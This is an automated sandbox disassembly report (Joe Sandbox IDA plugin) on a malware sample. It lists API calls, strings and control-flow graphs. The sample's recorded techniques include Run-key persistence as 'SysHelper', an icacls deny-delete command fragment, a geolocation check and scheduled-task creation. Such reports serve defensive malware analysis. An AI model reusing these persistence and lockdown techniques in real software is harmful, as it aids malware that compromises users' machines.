                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Variant$ClearInit$Initialize$CreateInstanceSecurityUninitialize
                                                                                                                                                                        • String ID: %Y-%m-%dT%H:%M:%S$--Task$2030-05-02T08:00:00$Author Name$PT5M$RegisterTaskDefinition. Err: %X$Time Trigger Task$Trigger1
                                                                                                                                                                        • API String ID: 2496729271-1738591096
                                                                                                                                                                        • Opcode ID: fba401028ec2711b2a1cf59977149ed72a4dc6ecdc8b210550a040966268c086
                                                                                                                                                                        • Instruction ID: 6dd41c0cf9d3b8cf1ffb7fbfc81cbe624eee9482d058eb1825666ed336dae431
                                                                                                                                                                        • Opcode Fuzzy Hash: fba401028ec2711b2a1cf59977149ed72a4dc6ecdc8b210550a040966268c086
                                                                                                                                                                        • Instruction Fuzzy Hash: 71525D70E00219DFDF10DBA5C898FAEBBF5AF49704F1481A8E505BB251DB70AE45CBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BA2220 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 116libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetCommandLineW.KERNEL32 ref: 00BA2235
                                                                                                                                                                        • CommandLineToArgvW.SHELL32(00000000,?), ref: 00BA2240
                                                                                                                                                                        • PathFindFileNameW.SHLWAPI(00000000), ref: 00BA2248
                                                                                                                                                                        • LoadLibraryW.KERNEL32(kernel32.dll), ref: 00BA2256
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00BA226A
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00BA2275
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00BA2280
                                                                                                                                                                        • LoadLibraryW.KERNEL32(Psapi.dll), ref: 00BA2291
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00BA229F
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00BA22AA
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00BA22B5
                                                                                                                                                                        • K32EnumProcesses.KERNEL32(?,0000A000,?), ref: 00BA22CD
                                                                                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00BA22FE
                                                                                                                                                                        • K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 00BA2315
                                                                                                                                                                        • K32GetModuleBaseNameW.KERNEL32(00000000,?,?,00000400), ref: 00BA232C
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00BA2347
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$CommandEnumLibraryLineLoadNameProcess$ArgvBaseCloseFileFindHandleModuleModulesOpenPathProcesses
                                                                                                                                                                        • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Psapi.dll$kernel32.dll
                                                                                                                                                                        • API String ID: 3668891214-3807497772
                                                                                                                                                                        • Opcode ID: 3a4825e02512e3c4d176ce502ad0f8d1decf4d8f7e37a038d37fe3828cbecd38
                                                                                                                                                                        • Instruction ID: a1d45fc6c4c0febdd17711efe1fb3018bd7ef492a5e00e474a1ef5a1615f57ee
                                                                                                                                                                        • Opcode Fuzzy Hash: 3a4825e02512e3c4d176ce502ad0f8d1decf4d8f7e37a038d37fe3828cbecd38
                                                                                                                                                                        • Instruction Fuzzy Hash: 13313F71E00319AFDF10AFA99C89FEEB7F8FF45705F1040AAE904E2150DA749A418BA5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00B9CF10 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 228networkfileCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 903 b9cf10-b9cfb0 call bbf7c0 call bbb420 InternetOpenW call ba5c10 InternetOpenUrlW 910 b9cfb9-b9cffb InternetReadFile InternetCloseHandle * 2 call ba56d0 903->910 911 b9cfb2-b9cfb4 903->911 914 b9d000-b9d01d 910->914 912 b9d213-b9d217 911->912 915 b9d219-b9d221 call bb2587 912->915 916 b9d224-b9d236 912->916 917 b9d01f-b9d021 914->917 918 b9d023-b9d02c 914->918 915->916 920 b9d039-b9d069 call ba56d0 call ba4300 917->920 921 b9d030-b9d035 918->921 928 b9d1cb 920->928 929 b9d06f-b9d08b call ba3010 920->929 921->921 923 b9d037 921->923 923->920 930 b9d1cd-b9d1d1 928->930 938 b9d0b9-b9d0bd 929->938 939 b9d08d-b9d091 929->939 932 b9d1de-b9d1f4 930->932 933 b9d1d3-b9d1db call bb2587 930->933 936 b9d201-b9d20f 932->936 937 b9d1f6-b9d1fe call bb2587 932->937 933->932 936->912 937->936 941 b9d0cd-b9d0e1 call ba4300 938->941 942 b9d0bf-b9d0ca call bb2587 938->942 944 b9d09e-b9d0b4 call ba3d40 939->944 945 b9d093-b9d09b call bb2587 939->945 941->928 954 b9d0e7-b9d149 call ba3010 941->954 942->941 944->938 945->944 957 b9d150-b9d15a 954->957 958 b9d15c-b9d15e 957->958 959 b9d160-b9d162 957->959 961 b9d16e-b9d18b call b9b650 958->961 960 b9d165-b9d16a 959->960 960->960 962 b9d16c 960->962 965 b9d19a-b9d19e 961->965 966 b9d18d-b9d18f 961->966 962->961 965->957 968 b9d1a0 965->968 966->965 967 b9d191-b9d198 966->967 967->965 969 b9d1c7-b9d1c9 967->969 970 b9d1a2-b9d1a6 968->970 969->970 971 b9d1a8-b9d1b0 call bb2587 970->971 972 b9d1b3-b9d1c5 970->972 971->972 972->930
                                                                                                                                                                        APIs
                                                                                                                                                                        • _memset.LIBCMT ref: 00B9CF4A
                                                                                                                                                                        • InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 00B9CF5F
                                                                                                                                                                        • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00B9CFA6
                                                                                                                                                                        • InternetReadFile.WININET(00000000,?,00002800,?), ref: 00B9CFCD
                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00B9CFDA
                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00B9CFDD
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Internet$CloseHandleOpen$FileRead_memset
                                                                                                                                                                        • String ID: $"country_code":"$$$($Microsoft Internet Explorer$https://api.2ip.ua/geo.json
                                                                                                                                                                        • API String ID: 1485416377-933853286
                                                                                                                                                                        • Opcode ID: a530dedef9b63392966bc8c23b79a841feaf16b2573da58d558adf5a04c64d91
                                                                                                                                                                        • Instruction ID: 8c3f939554028bdcb460ee0cc2b19c665ca51b2f442570f95020cadd565d385e
                                                                                                                                                                        • Opcode Fuzzy Hash: a530dedef9b63392966bc8c23b79a841feaf16b2573da58d558adf5a04c64d91
                                                                                                                                                                        • Instruction Fuzzy Hash: E2919E71D002589FEF20CFA4CD49BEEBBF4AF15704F2041A8E4057B291D7B65A88CB61
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BA1CD0 Relevance: 79.1, APIs: 36, Strings: 9, Instructions: 382stringregistrylibraryCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 606 ba1cd0-ba1d1a call bbf7c0 RegOpenKeyExW 609 ba1d20-ba1d8d call bbb420 RegQueryValueExW RegCloseKey 606->609 610 ba2207-ba2216 606->610 613 ba1d8f-ba1d91 609->613 614 ba1d93-ba1d9c 609->614 615 ba1daf-ba1dcb call ba5c10 613->615 616 ba1da0-ba1da9 614->616 620 ba1e7c-ba1e87 615->620 621 ba1dd1-ba1df8 lstrlenA call ba3520 615->621 616->616 617 ba1dab-ba1dad 616->617 617->615 623 ba1e89-ba1e91 call bb2587 620->623 624 ba1e94-ba1f34 LoadLibraryW GetProcAddress GetCommandLineW CommandLineToArgvW lstrcpyW PathFindFileNameW UuidCreate UuidToStringW 620->624 627 ba1dfa-ba1dfe 621->627 628 ba1e28-ba1e2c 621->628 623->624 635 ba1f3a-ba1f3f 624->635 636 ba1f36-ba1f38 624->636 631 ba1e0b-ba1e1f 627->631 632 ba1e00 627->632 633 ba1e2e-ba1e39 call bb2587 628->633 634 ba1e3c-ba1e50 PathFileExistsW 628->634 638 ba1e23 call ba45a0 631->638 637 ba1e03-ba1e08 call bb2587 632->637 633->634 634->620 642 ba1e52-ba1e57 634->642 641 ba1f40-ba1f49 635->641 640 ba1f4f-ba1f96 call ba5c10 RpcStringFreeW PathAppendW CreateDirectoryW 636->640 637->631 638->628 653 ba1f98-ba1fa0 640->653 654 ba1fce-ba1fe9 640->654 641->641 646 ba1f4b-ba1f4d 641->646 647 ba1e6a-ba1e6e 642->647 648 ba1e59-ba1e5e 642->648 646->640 647->610 651 ba1e74-ba1e77 647->651 648->647 649 ba1e60-ba1e65 call ba4690 648->649 649->647 655 ba21ff-ba2204 call bb2587 651->655 656 ba1fa2-ba1fa4 653->656 657 ba1fa6-ba1faf 653->657 659 ba1feb-ba1fed 654->659 660 ba1fef-ba1ff8 654->660 655->610 661 ba1fbf-ba1fc9 call ba5c10 656->661 663 ba1fb0-ba1fb9 657->663 664 ba200f-ba2076 call ba5c10 PathAppendW DeleteFileW CopyFileW RegOpenKeyExW 659->664 665 ba2000-ba2009 660->665 661->654 663->663 666 ba1fbb-ba1fbd 663->666 671 ba207c-ba2107 call bbb420 lstrcpyW lstrcatW * 2 lstrlenW RegSetValueExW RegCloseKey 664->671 672 ba21d1-ba21d5 664->672 665->665 668 ba200b-ba200d 665->668 666->661 668->664 679 ba2109-ba2110 call ba3260 671->679 680 ba2115-ba21a8 call bbb420 SetLastError lstrcpyW lstrcatW * 2 CreateProcessW 671->680 674 ba21e2-ba21fa 672->674 675 ba21d7-ba21df call bb2587 672->675 674->610 676 ba21fc 674->676 675->674 676->655 679->680 685 ba21aa-ba21b0 GetLastError 680->685 686 ba21b2-ba21b8 680->686 685->672 687 ba21c0-ba21cf WaitForSingleObject 686->687 687->672 687->687
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,00C5AC68,000000FF), ref: 00BA1D12
                                                                                                                                                                        • _memset.LIBCMT ref: 00BA1D3B
                                                                                                                                                                        • RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00BA1D63
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C5AC68,000000FF), ref: 00BA1D6C
                                                                                                                                                                        • lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00BA1DD6
                                                                                                                                                                        • PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00BA1E48
                                                                                                                                                                        • LoadLibraryW.KERNEL32(Shell32.dll,?,?), ref: 00BA1E99
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00BA1EA5
                                                                                                                                                                        • GetCommandLineW.KERNEL32 ref: 00BA1EB4
                                                                                                                                                                        • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00BA1EBF
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00BA1ECE
                                                                                                                                                                        • PathFindFileNameW.SHLWAPI(?), ref: 00BA1EDB
                                                                                                                                                                        • UuidCreate.RPCRT4(?), ref: 00BA1EFC
                                                                                                                                                                        • UuidToStringW.RPCRT4(?,?), ref: 00BA1F14
                                                                                                                                                                        • RpcStringFreeW.RPCRT4(00000000), ref: 00BA1F64
                                                                                                                                                                        • PathAppendW.SHLWAPI(?,?), ref: 00BA1F83
                                                                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00BA1F8E
                                                                                                                                                                        • PathAppendW.SHLWAPI(?,?,?,?), ref: 00BA202D
                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00BA2036
                                                                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 00BA204C
                                                                                                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00BA206E
                                                                                                                                                                        • _memset.LIBCMT ref: 00BA2090
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00C902FC), ref: 00BA20AA
                                                                                                                                                                        • lstrcatW.KERNEL32(?,?), ref: 00BA20C0
                                                                                                                                                                        • lstrcatW.KERNEL32(?," --AutoStart), ref: 00BA20CE
                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 00BA20D7
                                                                                                                                                                        • RegSetValueExW.KERNEL32(00000000,SysHelper,00000000,00000002,?,00000000), ref: 00BA20F3
                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00BA20FC
                                                                                                                                                                        • _memset.LIBCMT ref: 00BA2120
                                                                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 00BA2146
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,icacls "), ref: 00BA2158
                                                                                                                                                                        • lstrcatW.KERNEL32(?,?), ref: 00BA216D
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FilePath$_memsetlstrcatlstrcpy$AppendCloseCommandCreateLineOpenStringUuidValuelstrlen$AddressArgvCopyDeleteDirectoryErrorExistsFindFreeLastLibraryLoadNameProcQuery
                                                                                                                                                                        • String ID: " --AutoStart$" --AutoStart$" /deny *S-1-1-0:(OI)(CI)(DE,DC)$D$SHGetFolderPathW$Shell32.dll$Software\Microsoft\Windows\CurrentVersion\Run$SysHelper$icacls "
                                                                                                                                                                        • API String ID: 2589766509-1182136429
                                                                                                                                                                        • Opcode ID: 78a923f88a7ac772b79cfc52db1606d5d343b559f7a2b3e86d56c0ae9d11001b
                                                                                                                                                                        • Instruction ID: a462904f1f806b46da07b537519e7d62a0c5dc1e09f74b1344c065141fd00c9e
                                                                                                                                                                        • Opcode Fuzzy Hash: 78a923f88a7ac772b79cfc52db1606d5d343b559f7a2b3e86d56c0ae9d11001b
                                                                                                                                                                        • Instruction Fuzzy Hash: 62E15B75D0431AAFDF24DBA4CD89BEEB7B8FF04305F1044AAE505B6190EB74AA85CB50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BB3576 Relevance: 15.3, APIs: 10, Instructions: 258COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 975 bb3576-bb358f 976 bb35a9-bb35be call bbb420 975->976 977 bb3591-bb359b call bb5208 call bb42d2 975->977 976->977 983 bb35c0-bb35c3 976->983 984 bb35a0 977->984 985 bb35d7-bb35dd 983->985 986 bb35c5 983->986 987 bb35a2-bb35a8 984->987 990 bb35e9 call bbfb64 985->990 991 bb35df 985->991 988 bb35cb-bb35d5 call bb5208 986->988 989 bb35c7-bb35c9 986->989 988->984 989->985 989->988 995 bb35ee-bb35fa call bbf803 990->995 991->988 994 bb35e1-bb35e7 991->994 994->988 994->990 999 bb3600-bb360c call bbf82d 995->999 1000 bb37e5-bb37ef call bb42fd 995->1000 999->1000 1005 bb3612-bb361e call bbf857 999->1005 1005->1000 1008 bb3624-bb362b 1005->1008 1009 bb369b-bb36a6 call bbf939 1008->1009 1010 bb362d 1008->1010 1009->987 1017 bb36ac-bb36af 1009->1017 1012 bb362f-bb3635 1010->1012 1013 bb3637-bb3653 call bbf939 1010->1013 1012->1009 1012->1013 1013->987 1018 bb3659-bb365c 1013->1018 1019 bb36de-bb36eb 1017->1019 1020 bb36b1-bb36ba call bbfbb4 1017->1020 1021 bb379e-bb37a0 1018->1021 1022 bb3662-bb366b call bbfbb4 1018->1022 1023 bb36ed-bb36fc call bc05a0 1019->1023 1020->1019 1028 bb36bc-bb36dc 1020->1028 1021->987 1022->1021 1031 bb3671-bb3689 call bbf939 1022->1031 1032 bb3709-bb3730 call bc04f0 call bc05a0 1023->1032 1033 bb36fe-bb3706 1023->1033 1028->1023 1031->987 1038 bb368f-bb3696 1031->1038 1041 bb373e-bb3765 call bc04f0 call bc05a0 1032->1041 1042 bb3732-bb373b 1032->1042 1033->1032 1038->1021 1047 bb3773-bb3782 call bc04f0 1041->1047 1048 bb3767-bb3770 1041->1048 1042->1041 1051 bb37af-bb37c8 1047->1051 1052 bb3784 1047->1052 1048->1047 1055 bb379b 1051->1055 1056 bb37ca-bb37e3 1051->1056 1053 bb378a-bb3798 1052->1053 1054 bb3786-bb3788 1052->1054 1053->1055 1054->1053 1057 bb37a5-bb37a7 1054->1057 1055->1021 1056->1021 1057->1021 1058 bb37a9 1057->1058 1058->1051 1059 bb37ab-bb37ad 1058->1059 1059->1021 1059->1051
                                                                                                                                                                        APIs
                                                                                                                                                                        • _memset.LIBCMT ref: 00BB35B1
                                                                                                                                                                          • Part of subcall function 00BB5208: __getptd_noexit.LIBCMT ref: 00BB5208
                                                                                                                                                                        • __gmtime64_s.LIBCMT ref: 00BB364A
                                                                                                                                                                        • __gmtime64_s.LIBCMT ref: 00BB3680
                                                                                                                                                                        • __gmtime64_s.LIBCMT ref: 00BB369D
                                                                                                                                                                        • __allrem.LIBCMT ref: 00BB36F3
                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BB370F
                                                                                                                                                                        • __allrem.LIBCMT ref: 00BB3726
                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BB3744
                                                                                                                                                                        • __allrem.LIBCMT ref: 00BB375B
                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BB3779
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit_memset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1503770280-0
                                                                                                                                                                        • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                                                                                        • Instruction ID: 28060a13275d1e9354f3e82df437614ccc85bc7fd4cfd4f32046b7a6c076b34e
                                                                                                                                                                        • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                                                                                        • Instruction Fuzzy Hash: BD7196B1A00716ABD7249E79CC81FFAB3E8EF54724F1442BAF514D6681EBB0DE408790
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00B9EF50 Relevance: 4.6, APIs: 3, Instructions: 57COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1060 b9ef50-b9ef7a call bb0c62 1063 b9efdc-b9efe2 1060->1063 1064 b9ef7c 1060->1064 1065 b9ef80-b9ef85 call bb0c62 1064->1065 1067 b9ef8a-b9efbd call bbb420 1065->1067 1070 b9efc0-b9efcf 1067->1070 1070->1070 1071 b9efd1-b9efda 1070->1071 1071->1063 1071->1065
                                                                                                                                                                        APIs
                                                                                                                                                                        • _malloc.LIBCMT ref: 00B9EF69
                                                                                                                                                                          • Part of subcall function 00BB0C62: __FF_MSGBANNER.LIBCMT ref: 00BB0C79
                                                                                                                                                                          • Part of subcall function 00BB0C62: __NMSG_WRITE.LIBCMT ref: 00BB0C80
                                                                                                                                                                          • Part of subcall function 00BB0C62: RtlAllocateHeap.NTDLL(00DB0000,00000000,00000001,?,?,?,?,00BB3B69,?), ref: 00BB0CA5
                                                                                                                                                                        • _malloc.LIBCMT ref: 00B9EF85
                                                                                                                                                                        • _memset.LIBCMT ref: 00B9EF9B
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _malloc$AllocateHeap_memset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3655941445-0
                                                                                                                                                                        • Opcode ID: be46dd26feb53539181879275dd2331845889927b108b084fdb43cd894a3e3ad
                                                                                                                                                                        • Instruction ID: e2b0ee1392a8786655ed1856109ffa7dbb2a55eae6c31c645857bd3a013b4851
                                                                                                                                                                        • Opcode Fuzzy Hash: be46dd26feb53539181879275dd2331845889927b108b084fdb43cd894a3e3ad
                                                                                                                                                                        • Instruction Fuzzy Hash: 6B11A331500614EFDB10DF98C881BAA7BB5FF89310F2441E9E9499B356D771E912CB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BB3B4C Relevance: 4.5, APIs: 3, Instructions: 44COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1072 bb3b4c-bb3b52 1073 bb3b61-bb3b64 call bb0c62 1072->1073 1075 bb3b69-bb3b6c 1073->1075 1076 bb3b6e-bb3b71 1075->1076 1077 bb3b54-bb3b5f call bb793d 1075->1077 1077->1073 1080 bb3b72-bb3bb2 call bc0d21 call bc0eca call bc0d91 1077->1080 1087 bb3bbb-bb3bbf 1080->1087 1088 bb3bb4-bb3bba call bb2587 1080->1088 1088->1087
                                                                                                                                                                        APIs
                                                                                                                                                                        • _malloc.LIBCMT ref: 00BB3B64
                                                                                                                                                                          • Part of subcall function 00BB0C62: __FF_MSGBANNER.LIBCMT ref: 00BB0C79
                                                                                                                                                                          • Part of subcall function 00BB0C62: __NMSG_WRITE.LIBCMT ref: 00BB0C80
                                                                                                                                                                          • Part of subcall function 00BB0C62: RtlAllocateHeap.NTDLL(00DB0000,00000000,00000001,?,?,?,?,00BB3B69,?), ref: 00BB0CA5
                                                                                                                                                                        • std::exception::exception.LIBCMT ref: 00BB3B82
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00BB3B97
                                                                                                                                                                          • Part of subcall function 00BC0ECA: RaiseException.KERNEL32(?,?,?,00C9793C,?,?,?,?,?,00BB3B9C,?,00C9793C,?,00000001), ref: 00BC0F1F
